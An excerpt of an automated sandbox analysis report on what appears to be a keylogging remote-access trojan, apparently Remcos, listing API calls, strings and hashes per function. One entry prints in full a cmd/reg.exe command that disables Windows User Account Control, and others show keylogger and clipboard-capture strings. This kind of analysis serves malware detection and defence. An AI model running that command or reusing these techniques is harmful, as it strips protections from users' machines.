                                                • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                • _free.LIBCMT ref: 00446EF6
                                                • _free.LIBCMT ref: 00446F1E
                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                • _abort.LIBCMT ref: 00446F3D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$InfoQueryValue
                                                • String ID: [regsplt]$DG
                                                • API String ID: 3554306468-1089238109
                                                • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                • API String ID: 2974294136-753205382
                                                • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                • wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventLocalTimewsprintf
                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                • API String ID: 1497725170-248792730
                                                • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSizeSleep
                                                • String ID: `AG
                                                • API String ID: 1958988193-3058481221
                                                • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                • String ID: 0$MsgWindowClass
                                                • API String ID: 2877667751-2410386613
                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                Strings
                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                • API String ID: 2922976086-4183131282
                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                • String ID: KeepAlive | Disabled
                                                • API String ID: 2993684571-305739064
                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                Strings
                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                • API String ID: 3024135584-2418719853
                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll$`#v
                                                • API String ID: 1646373207-1032071883
                                                • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                • String ID:
                                                • API String ID: 3525466593-0
                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 4269425633-0
                                                • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                • __freea.LIBCMT ref: 0044FFC4
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 313313983-0
                                                • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
